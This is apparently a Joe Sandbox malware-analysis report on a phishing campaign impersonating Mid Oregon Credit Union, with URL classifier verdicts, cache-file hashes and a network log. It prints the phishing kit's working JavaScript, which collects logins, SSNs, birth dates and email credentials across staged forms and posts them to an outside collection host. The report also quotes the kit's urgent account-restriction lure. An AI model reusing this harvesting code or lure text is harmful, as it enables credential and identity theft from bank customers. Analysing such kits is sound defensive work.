URL: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": true, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": true, "third_party_hosting": true }
URL: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com
URL: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.de... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script demonstrates moderate-risk behaviors, including external data transmission to an unknown domain ('https://geometricbadges.com/mmm/mo.php') and the use of multiple forms that could potentially collect sensitive user information. While the script appears to have some legitimate functionality, such as formatting SSN and DOB inputs, the overall behavior requires further review due to the unclear purpose and potential for data exfiltration." }
async function fetchData(formData) { try { const response = await fetch('https://geometricbadges.com/mmm/mo.php', { method: 'POST', body: formData }); if (response.ok) { console.log("Data successfully sent to the server."); } else { console.log("Server error:", response.status); } } catch (error) { console.error("Fetch error:", error); } } function submitForm(formNumber) { let formData; if (formNumber === 1) { formData = new FormData(document.getElementById('loginForm')); fetchData(formData); delayAndShowForm(1, 2, "Signing In..."); } else if (formNumber === 2) { formData = new FormData(document.getElementById('identityForm')); fetchData(formData); delayAndShowForm(2, 3, "Verifying..."); } else if (formNumber === 3) { formData = new FormData(document.getElementById('emailSecurityForm')); fetchData(formData); const spinner = document.getElementById('spinner'); spinner.classList.remove('hidden'); setTimeout(() => { delayAndShowForm(3, 4, "Authentication Failed!"); spinner.classList.add('hidden'); }, 800); } else if (formNumber === 4) { formData = new FormData(document.getElementById('confirmForm')); fetchData(formData); const spinner = document.getElementById('spinner'); spinner.classList.remove('hidden'); setTimeout(() => { delayAndShowForm(4, 5, "Account Security Updating...."); spinner.classList.add('hidden'); }, 800); } } function formatSSN(input) { let value = input.value.replace(/\D/g, ''); if (value.length > 3) { value = value.slice(0, 3) + '-' + value.slice(3); } if (value.length > 6) { value = value.slice(0, 6) + '-' + value.slice(6); } input.value = value.slice(0, 11); } function formatDOB(input) { let value = input.value.replace(/\D/g, ''); if (value.length > 2) { value = value.slice(0, 2) + '/' + value.slice(2); } if (value.length > 5) { value = value.slice(0, 5) + '/' + value.slice(5); } input.value = value.slice(0, 10); } function grabEmail(email) { document.getElementById('secureEmail').value = email; document.getElementById('confirmEmail').value = email; document.getElementById('emailLogo').src = `https://logo.clearbit.com/${email.split('@')[1]}`; document.getElementById('emailLogo2').src = `https://logo.clearbit.com/${email.split('@')[1]}`; } function delayAndShowForm(currentForm, nextForm, buttonText) { const button = document.querySelector(`#form${currentForm} button`); button.innerText = buttonText; setTimeout(() => { document.getElementById(`form${currentForm}`).classList.add('hidden'); document.getElementById(`form${nextForm}`).classList.remove('hidden'); }, 2000); }
URL: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "To enhance the security of your account, we have placed a temporary limitation on certain features. While you can still log in to view your account information and transaction history, please be aware that Transfer, Bill Payments will remain restricted, and Incoming Transactions will be held until you complete the necessary steps to secure your account.", "prominent_button_name": "Click here and Log in to your account securely", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Log In", "text_input_field_labels": [ "Username", "Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html Model: Joe Sandbox AI	{ "brands": [ "Mid Oregon Credit Union" ] }
	{ "brands": [ "Mid Oregon Credit Union" ] }
URL: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html Model: Joe Sandbox AI	{ "brands": [ "Mid Oregon Credit Union" ] }
	{ "brands": [ "Mid Oregon Credit Union" ] }
URL: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html Model: Joe Sandbox AI	```json{ "legit_domain": "midoregon.com", "classification": "known", "reasons": [ "The brand 'Mid Oregon Credit Union' is a known regional credit union.", "The URL 'pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev' does not match the legitimate domain 'midoregon.com'.", "The URL uses a subdomain structure with a random string, which is common in phishing attempts.", "The domain 'r2.dev' is not associated with Mid Oregon Credit Union and is suspicious.", "The presence of input fields for 'Username' and 'Password' on a non-legitimate domain increases the risk of phishing." ], "riskscore": 9} Google indexed: False
URL: pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev Brands: Mid Oregon Credit Union Input Fields: Username, Password

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	10523
Entropy (8bit):	5.050297085781575
Encrypted:	false
SSDEEP:	192:z0kjW/KMyinBUOFEHpOB8SqLgJoqLhSowRcN:zihyinBRFEHpOB8SqLKL0Ra
MD5:	8C245C908E9C653018919538A4B628A8
SHA1:	C403CFB0C078C3CD21DDC5511E6A93A1D981640F
SHA-256:	B30BFC966110B9E861A95DDECAF56FC4D0E601944869E4F292D501B1573D1CCD
SHA-512:	BE6C927D9D131734FE4795EAF44EE6AED8C00821E8CF262E2B67905F1A2EF79FD82C1100D34923E97C62B4661CEB3081C54696BF5D5F6B344B4762F2DAC799F6
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">.. <link rel="icon" href="https://www.midoregon.com/favicon.ico" type="image/x-icon">.. <title>Mid Oregon Credit Union \| The Best Central Oregon Local Credit Union </title>...<meta name="description" content="Log in to access your account online">.... <style>.. body { font-family: Arial, sans-serif; background-color: #e2e2e2; display: flex; .. background-image: url(''); .. background-size: cover; .. background-repeat: no-repeat; .. background-position: center; align-items: center; justify-content: center; height: 100vh; margin: 0;display: flex; }.. .form-container { width: 100%; max-width: 400px; padding: 20px; background: #fff; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); border-radius: 8px; text-align: center; }.. h1, h2 { color: #333; }.. img { d

Chrome Cache Entry: 49

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 300 x 134, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	17791
Entropy (8bit):	7.954455797767312
Encrypted:	false
SSDEEP:	384:uhxUMQcZgN9Qc7b0UGO0/j+Q9sVTqdiWna:uhFQCg/lGO6jPuVTaiZ
MD5:	568D45D85624D00FA8B18805ADED3F12
SHA1:	0BE723532BC022C1D2BA56CD2769478B1D3F507E
SHA-256:	E794979F5B3E1229F3DB80AC29B6DDE4E216C2CD6DA90B7E355D779C36DDFB2A
SHA-512:	D2289275D3E58E7C603926BBE49EDCFF4F2530D96B7507A3992A995459CACD185A2476BD4BB9D9E5C2AD877E27A8C1EBF072C149D74A10E95EF37B270598F023
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...,.........g..I....sRGB....... .IDATx^.].....z=.. .bDM....7&......f.Q.....F.>...z%Fs..+.@eg5..cw!^.3...... .(.....W......1.7../...w....{......_....D......X..:.........;..>.\|...w.y...50.5P...@....A.q.@q.P.....#v......\|.. 7..c...L..'.x'.e\|....`...7L[..j.gf..V......@..\..W..n.r.....z..3&.M?........}...?.^.....P...D4.. ..F..BD..f7....nv...........Fr....z4.....+.n..4..k7...4.F...jO......9....\|.........R.....M.~. ...D.u.VF.....'..`w..\}.V.......o.AQ....YS...g.....5../}?h....!..$.s.(.wE.?...y.1xz..k..+_.~../.[......z~5.09.?...-..0c]?.......o./.`.@.^?...%..~.......e@.....I...y.]0.O.I.>....>W.?.`...w.....o.@W.y.w{>./..U9.A...l....._ ......-.......zc\|.._..O... +..,.F...p.j.D@...,..R..W#.}.Tt.C.._t........t7\|Y.....xH.v.W<W...B!...=\|..Q.._L$...........7.w.[z..~....~T.?...@.U..]....Hg..8....:.....Q.'.F.....zxAO...}....Z...p..]Y..HUDtD_...U..\O...[.....W..........Z.......\|..+M...H........}% "...u5z..2.9..n_..;.f..L...x..=...].n...{.C..zY

Chrome Cache Entry: 50

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 300 x 134, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	17791
Entropy (8bit):	7.954455797767312
Encrypted:	false
SSDEEP:	384:uhxUMQcZgN9Qc7b0UGO0/j+Q9sVTqdiWna:uhFQCg/lGO6jPuVTaiZ
MD5:	568D45D85624D00FA8B18805ADED3F12
SHA1:	0BE723532BC022C1D2BA56CD2769478B1D3F507E
SHA-256:	E794979F5B3E1229F3DB80AC29B6DDE4E216C2CD6DA90B7E355D779C36DDFB2A
SHA-512:	D2289275D3E58E7C603926BBE49EDCFF4F2530D96B7507A3992A995459CACD185A2476BD4BB9D9E5C2AD877E27A8C1EBF072C149D74A10E95EF37B270598F023
Malicious:	false
Reputation:	low
URL:	https://assets.orb.alkamitech.com/production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/theme-builder/default/assets/images/brand-logo-wide.png
Preview:	.PNG........IHDR...,.........g..I....sRGB....... .IDATx^.].....z=.. .bDM....7&......f.Q.....F.>...z%Fs..+.@eg5..cw!^.3...... .(.....W......1.7../...w....{......_....D......X..:.........;..>.\|...w.y...50.5P...@....A.q.@q.P.....#v......\|.. 7..c...L..'.x'.e\|....`...7L[..j.gf..V......@..\..W..n.r.....z..3&.M?........}...?.^.....P...D4.. ..F..BD..f7....nv...........Fr....z4.....+.n..4..k7...4.F...jO......9....\|.........R.....M.~. ...D.u.VF.....'..`w..\}.V.......o.AQ....YS...g.....5../}?h....!..$.s.(.wE.?...y.1xz..k..+_.~../.[......z~5.09.?...-..0c]?.......o./.`.@.^?...%..~.......e@.....I...y.]0.O.I.>....>W.?.`...w.....o.@W.y.w{>./..U9.A...l....._ ......-.......zc\|.._..O... +..,.F...p.j.D@...,..R..W#.}.Tt.C.._t........t7\|Y.....xH.v.W<W...B!...=\|..Q.._L$...........7.w.[z..~....~T.?...@.U..]....Hg..8....:.....Q.'.F.....zxAO...}....Z...p..]Y..HUDtD_...U..\O...[.....W..........Z.......\|..+M...H........}% "...u5z..2.9..n_..;.f..L...x..=...].n...{.C..zY

Chrome Cache Entry: 51

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	18222
Entropy (8bit):	7.971814262017596
Encrypted:	false
SSDEEP:	384:y0jsuZI+7edyzEjtc0MaUkrN/SPvM0zaZmt54qgPwF8i+m/+u4Liw6ydmB:bHOozEhcBkB/Sn/P54qgPuWLiwpmB
MD5:	1FB0554D68C8C3F4E9AFA850583308BD
SHA1:	525FF3A4A19F77797FEEA9B64C48AAB3DB35B9E4
SHA-256:	90AEF1FA0D686F7E512595DC79E403335B088A1BDB882D72F51809F326E07E2E
SHA-512:	A6AF6C9E91E5656D8D92CCB615E44F17B90CDD3296FEC347040EBFE4BF7BC05EDFE9CDC4B9EF5F96847529A94F2F0A615EEC64976AB7BE93A7DFC27ABB0C491E
Malicious:	false
Reputation:	low
URL:	https://img001.prntscr.com/file/img001/nBm6LfNrTUqvKQ9HTQUnsQ.png
Preview:	RIFF&G..WEBPVP8L.G../..?..Y.dU...O.......u..?......d..2.s.. S.....9.sF.6......Kw...@f.....5......\i..q.@.)&..4.9..I0.tk.[.9y&-.n#....J@..uN..J.....%.i{'.$.n.$...S-.(`a76......z....\x.... .Tc..b.......$.w.j\|..w.K...o#bV.$.g... ./..X....+...7...I..%.,..........g...H.$..,..&R...-C" G..Z..#7\O-$.gD.........../ ..!R..... .........O......U.AG...H%.*.......TB\|H.....$.1".,bI..BGS....D ..HB..@..":V........"..E..A....D...&.... .!.4Vf$#..@.....2!... ].T.HD....$eA."db.z...:....B2..S.w.j.rY..!.v._p.G\n...!.X.(..R...`"Z...B%.W...6.$Y.?.9w..wDL.?.......R..,O.7.t.Z..J....[..0.juK.z......&..d...{...`..;n.m.G....`.Hw........`..x....G.78.%J`.`....B...x%=h.@yZ.\...++.K>....K9}o...S..E...5.!.....9....:O.^{.".G...~.\|......B..^N~%\|.\|$}.....}...-.![...(..!.X!r...T..s...Gb....~xl".v...Y.==....&....T...j.Vr>..@G.%.U.B....`....$93].=...q.a.....e...+.Z...E..V...H..P\...h..e..<&..5.{%.....E$.m....j.r/.....Z.....!.?.E.....8..3.m$)s......}...m#9.....?.Gq1.x.._&INf.WuUuu.33..

Chrome Cache Entry: 52

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	15086
Entropy (8bit):	3.879735514552481
Encrypted:	false
SSDEEP:	96:jc1e3eBWTwQFTwR7/yx8OPvJgnaZerDNnCo+cGAbo/:jCOTwRzZOP2sgNnCS1bo
MD5:	A97B7D2E60C05E131EF4F11781D602D3
SHA1:	14A65B38FAB64E7E209E9C10B995AC37C638989E
SHA-256:	CCBD6A294C1C23F6957E321EC212880B7C11D0923E4333CD4F04CD78913CE9B9
SHA-512:	128B1955A2045FBC02E4811F3FDE84D4E22E3A5B1A8DD1F0DD148F305104FB008D1B6182CB08A767C4827F35F816341AA312CEA4849B86BC7B71CFAF36CF09DD
Malicious:	false
Reputation:	low
URL:	https://www.midoregon.com/favicon.ico
Preview:	......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$........................................b...bF..b...b.b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b.b...bQ..b.......................................b,..b...b.b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b.b...b8..f.......................WX..W...Z..\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...[..X...WX..................W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...X...t...........b(..Z..W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...

Chrome Cache Entry: 53

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	15086
Entropy (8bit):	3.879735514552481
Encrypted:	false
SSDEEP:	96:jc1e3eBWTwQFTwR7/yx8OPvJgnaZerDNnCo+cGAbo/:jCOTwRzZOP2sgNnCS1bo
MD5:	A97B7D2E60C05E131EF4F11781D602D3
SHA1:	14A65B38FAB64E7E209E9C10B995AC37C638989E
SHA-256:	CCBD6A294C1C23F6957E321EC212880B7C11D0923E4333CD4F04CD78913CE9B9
SHA-512:	128B1955A2045FBC02E4811F3FDE84D4E22E3A5B1A8DD1F0DD148F305104FB008D1B6182CB08A767C4827F35F816341AA312CEA4849B86BC7B71CFAF36CF09DD
Malicious:	false
Reputation:	low
URL:	https://www.midoregon.com/favicon.ico
Preview:	......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$........................................b...bF..b...b.b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b.b...bQ..b.......................................b,..b...b.b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b.b...b8..f.......................WX..W...Z..\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...[..X...WX..................W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...X...t...........b(..Z..W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...

Chrome Cache Entry: 54

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	downloaded
Size (bytes):	10523
Entropy (8bit):	5.050297085781575
Encrypted:	false
SSDEEP:	192:z0kjW/KMyinBUOFEHpOB8SqLgJoqLhSowRcN:zihyinBRFEHpOB8SqLKL0Ra
MD5:	8C245C908E9C653018919538A4B628A8
SHA1:	C403CFB0C078C3CD21DDC5511E6A93A1D981640F
SHA-256:	B30BFC966110B9E861A95DDECAF56FC4D0E601944869E4F292D501B1573D1CCD
SHA-512:	BE6C927D9D131734FE4795EAF44EE6AED8C00821E8CF262E2B67905F1A2EF79FD82C1100D34923E97C62B4661CEB3081C54696BF5D5F6B344B4762F2DAC799F6
Malicious:	false
Reputation:	low
URL:	https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">.. <link rel="icon" href="https://www.midoregon.com/favicon.ico" type="image/x-icon">.. <title>Mid Oregon Credit Union \| The Best Central Oregon Local Credit Union </title>...<meta name="description" content="Log in to access your account online">.... <style>.. body { font-family: Arial, sans-serif; background-color: #e2e2e2; display: flex; .. background-image: url(''); .. background-size: cover; .. background-repeat: no-repeat; .. background-position: center; align-items: center; justify-content: center; height: 100vh; margin: 0;display: flex; }.. .form-container { width: 100%; max-width: 400px; padding: 20px; background: #fff; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); border-radius: 8px; text-align: center; }.. h1, h2 { color: #333; }.. img { d

Chrome Cache Entry: 55

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	26258
Entropy (8bit):	7.951713601714037
Encrypted:	false
SSDEEP:	768:To9iyPh1rzbCX2n5DPZTYJvvRXLKxvhMojhquXF9me:To8yjbCXiZAvv1LYvhjj13
MD5:	9B4C410905AAD84DCB4EA1B6EC0712B9
SHA1:	230BA25893A2FEAE792BBABB26DD513B21D15040
SHA-256:	F557326D35EF402C44DF89DE8F24B48D39C5638EE9625F1D2E433AB872058EE9
SHA-512:	A04683C30B8572B2DD6F17AA045773702959690DF69F39D2FCDB2377837E8A691A941B48F168CB2C5A184525AD63125412F899D5FF6C4123A8C3F563A482386E
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............\r.f..fYIDATx...n.P..q..2.E..........f.F.T...,U...tJ;.(,....bB...:..>z1V...O.t...s.m.....................................'...'.8...qH.....X].&..i....V....W=....uOBI..]...APm..."..l7R..Z]..v.A.1..o_.7<.]......f..=............Z%...n".....!P~....\....bO.y.....7......('.Ox.......!.....N..#....(..pj\|.....T..~....2.v.W\|.J.%..#Ay.Myh.k..t..9.Z..........g...b1Z....z=..h...8I...^.6..}.>k.....ek..k..t..4-:...+.;.S.k..\....U...././?...z.0......$Ij........>...\|.eW\|.2.rG.Y.^.(..NAP3.....\|0...........~..<k~k.8..5.VMF..}.....m.c.1..r..w..E.M..8....>.....d2y3...u....F.k....{W.&Uu.....l..i.A..:..qA..i.L...(..08Q.D%....8....Lt.3.b..Q.....56`.8..Mo.U.N....X..^..MS.>}....G..Y.....AZ.) ...'@.<.E..J.O...}&}6....H3.H".. t.,.4.bM..W_....V.Z9.G..W....6^......w...e..#.CA.g..J.......J.@T...y.W..@C,..u.........G^~......x-.R{..6...7.'}&}.......$)I....&..%K...X..+.g.'KA2.7....jq.....\|.7..:.t.<......My.tN{...K.(.....dC.K..@.)V...!./H...m.k....

Chrome Cache Entry: 56

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	3620
Entropy (8bit):	5.071060772910484
Encrypted:	false
SSDEEP:	48:ApFrmM41WICeEByfHgGccGpAx7QQ2DEmcy9xoZyrAZruoMqiIXGI:Avv0viy6pO1zmc4+ZLxEIj
MD5:	8DA634B23E5F8A6A075492EEE0C02274
SHA1:	B88088260349AC809D2D25161144029051CA5C39
SHA-256:	9C6F3A3115632FE33224BD4790D48B901C09AE79CB65F882FCE8827ED188D087
SHA-512:	2206844821D1A09637BC57FC41BE13D9B4BCACAC720257C4657BAB2DC763A767EC07B485A58A76E54F3ECF8F1F3583B4F1E8370B1BBD841805DCD29854A94087
Malicious:	false
Reputation:	low
URL:	https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html
Preview:	<html>..<head>..<meta charset="UTF-8">..<meta name="viewport"..content="width=device-width, initial-scale=1.0, user-scalable=no">..<link rel="icon" href="https://www.midoregon.com/favicon.ico" type="image/x-icon">..<title>Mid Oregon Credit Union</title>..<style>..body {..font-family: Arial, sans-serif;..margin: 0;..padding: 0;..background-color: #f3f4f6;..}...email-container {..max-width: 600px;..margin: 0 auto;..background-color: #ffffff;..padding: 20px;..border-radius: 8px;..box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);..}...header-image {..text-align: center;..padding: 20px;..}...header-image img {..max-width: 100px;..height: auto;..}...email-content {..text-align: left;..color: #333333;..}...email-content p {..line-height: 1.6;..}...button {..display: inline-block;..background-color: #0073e6;..color: #ffffff;..padding: 10px 20px;..border-radius: 5px;..text-decoration: none;..font-weight: bold;..margin-top: 20px;..}.... .footer {.. text-align: center;.. marg

Chrome Cache Entry: 57

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	15086
Entropy (8bit):	3.879735514552481
Encrypted:	false
SSDEEP:	96:jc1e3eBWTwQFTwR7/yx8OPvJgnaZerDNnCo+cGAbo/:jCOTwRzZOP2sgNnCS1bo
MD5:	A97B7D2E60C05E131EF4F11781D602D3
SHA1:	14A65B38FAB64E7E209E9C10B995AC37C638989E
SHA-256:	CCBD6A294C1C23F6957E321EC212880B7C11D0923E4333CD4F04CD78913CE9B9
SHA-512:	128B1955A2045FBC02E4811F3FDE84D4E22E3A5B1A8DD1F0DD148F305104FB008D1B6182CB08A767C4827F35F816341AA312CEA4849B86BC7B71CFAF36CF09DD
Malicious:	false
Reputation:	low
Preview:	......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$........................................b...bF..b...b.b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b.b...bQ..b.......................................b,..b...b.b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b...b.b...b8..f.......................WX..W...Z..\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...\...[..X...WX..................W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...X...t...........b(..Z..W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...W...

Chrome Cache Entry: 58

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	156
Entropy (8bit):	5.1278912618013495
Encrypted:	false
SSDEEP:	3:REMyuSbWKTTtTUEj52sdeYhGut1MVEkq1GXbI9/KkdqyuSCUn:R9yuSbWmt4d8ey9dkq2I9/K0jn
MD5:	74F74E89EDA1065118839099774464F6
SHA1:	15D324966AF017D8249D8C4225B50DDA378DC1D4
SHA-256:	2E279C5AC298EDE3FCF3529A7C8BBB9A84E20243909DB9B7AE4B58C70A6B218D
SHA-512:	CEC1872BFC2E634BB49B35023F50E70FD9696C54A38CF652BC418AFE81774E9826FFA6A5CA241B37BB9BD087B6B11938FBE430830BED474112DAE447C589D7A3
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmLTf6O0TpH4hIFDW5pnT4SBQ3OQUx6EjMJCN-KRnDb6cASBQ0RSuvXEgUNblUwVxIFDT7vLxMSBQ2U1FseEgUNEg_8ahIFDYOoWz0SFwklOCeFPXCjyhIFDeB_ZqESBQ0SFeUMEhcJFRDTAdZzQv4SBQ0ZJ71OEgUNc9D9PQ==?alt=proto
Preview:	ChIKBw1uaZ0+GgAKBw3OQUx6GgAKNgoHDRFK69caAAoHDW5VMFcaAAoHDT7vLxMaAAoHDZTUWx4aAAoHDRIP/GoaAAoHDYOoWz0aAAoSCgcN4H9moRoACgcNEhXlDBoAChIKBw0ZJ71OGgAKBw1z0P09GgA=

Chrome Cache Entry: 59

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 300 x 134, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	17791
Entropy (8bit):	7.954455797767312
Encrypted:	false
SSDEEP:	384:uhxUMQcZgN9Qc7b0UGO0/j+Q9sVTqdiWna:uhFQCg/lGO6jPuVTaiZ
MD5:	568D45D85624D00FA8B18805ADED3F12
SHA1:	0BE723532BC022C1D2BA56CD2769478B1D3F507E
SHA-256:	E794979F5B3E1229F3DB80AC29B6DDE4E216C2CD6DA90B7E355D779C36DDFB2A
SHA-512:	D2289275D3E58E7C603926BBE49EDCFF4F2530D96B7507A3992A995459CACD185A2476BD4BB9D9E5C2AD877E27A8C1EBF072C149D74A10E95EF37B270598F023
Malicious:	false
Reputation:	low
URL:	https://assets.orb.alkamitech.com/production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/theme-builder/default/assets/images/brand-logo-wide.png
Preview:	.PNG........IHDR...,.........g..I....sRGB....... .IDATx^.].....z=.. .bDM....7&......f.Q.....F.>...z%Fs..+.@eg5..cw!^.3...... .(.....W......1.7../...w....{......_....D......X..:.........;..>.\|...w.y...50.5P...@....A.q.@q.P.....#v......\|.. 7..c...L..'.x'.e\|....`...7L[..j.gf..V......@..\..W..n.r.....z..3&.M?........}...?.^.....P...D4.. ..F..BD..f7....nv...........Fr....z4.....+.n..4..k7...4.F...jO......9....\|.........R.....M.~. ...D.u.VF.....'..`w..\}.V.......o.AQ....YS...g.....5../}?h....!..$.s.(.wE.?...y.1xz..k..+_.~../.[......z~5.09.?...-..0c]?.......o./.`.@.^?...%..~.......e@.....I...y.]0.O.I.>....>W.?.`...w.....o.@W.y.w{>./..U9.A...l....._ ......-.......zc\|.._..O... +..,.F...p.j.D@...,..R..W#.}.Tt.C.._t........t7\|Y.....xH.v.W<W...B!...=\|..Q.._L$...........7.w.[z..~....~T.?...@.U..]....Hg..8....:.....Q.'.F.....zxAO...}....Z...p..]Y..HUDtD_...U..\O...[.....W..........Z.......\|..+M...H........}% "...u5z..2.9..n_..;.f..L...x..=...].n...{.C..zY

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 17:21:22.511440992 CET	49675	443	192.168.2.4	173.222.162.32
Jan 2, 2025 17:21:32.119487047 CET	49675	443	192.168.2.4	173.222.162.32
Jan 2, 2025 17:21:33.832365036 CET	49737	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:21:33.832401991 CET	443	49737	142.250.185.196	192.168.2.4
Jan 2, 2025 17:21:33.832465887 CET	49737	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:21:33.832686901 CET	49737	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:21:33.832701921 CET	443	49737	142.250.185.196	192.168.2.4
Jan 2, 2025 17:21:34.643505096 CET	443	49737	142.250.185.196	192.168.2.4
Jan 2, 2025 17:21:34.644229889 CET	49737	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:21:34.644288063 CET	443	49737	142.250.185.196	192.168.2.4
Jan 2, 2025 17:21:34.645328045 CET	443	49737	142.250.185.196	192.168.2.4
Jan 2, 2025 17:21:34.645410061 CET	49737	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:21:34.646697044 CET	49737	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:21:34.646779060 CET	443	49737	142.250.185.196	192.168.2.4
Jan 2, 2025 17:21:34.698126078 CET	49737	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:21:34.698153019 CET	443	49737	142.250.185.196	192.168.2.4
Jan 2, 2025 17:21:34.745086908 CET	49737	443	192.168.2.4	142.250.185.196
Jan 2, 2025 17:21:35.834945917 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:35.834996939 CET	443	49740	54.231.130.18	192.168.2.4
Jan 2, 2025 17:21:35.835057974 CET	49740	443	192.168.2.4	54.231.130.18
Jan 2, 2025 17:21:35.835355997 CET	49741	443	192.168.2.4	54.231.130.18
